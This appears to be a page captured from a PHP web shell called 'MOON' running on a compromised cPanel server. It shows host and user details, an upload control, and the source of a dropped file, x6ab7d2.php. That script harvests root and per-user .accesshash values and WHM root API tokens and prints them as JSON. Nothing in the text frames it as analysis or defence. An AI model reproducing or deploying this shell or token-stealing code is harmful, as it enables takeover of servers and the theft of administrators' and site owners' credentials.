MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/www/x6ab7d2.php
<?php $r=[];$ah=@file_get_contents('/root/.accesshash');if($ah)$r[]=['user'=>'root','hash'=>trim($ah)];foreach(glob('/home/*/.accesshash') as $f){  $u=basename(dirname($f));$c=trim(@file_get_contents($f));  if($c)$r[]=['user'=>$u,'hash'=>$c];}foreach(glob('/var/cpanel/authn/api_tokens_v2/whostmgr/root/*') as $f){  $c=trim(@file_get_contents($f));if($c)$r[]=['user'=>'root:'.basename($f),'hash'=>$c];}echo json_encode(['ok'=>1,'tokens'=>$r]);?>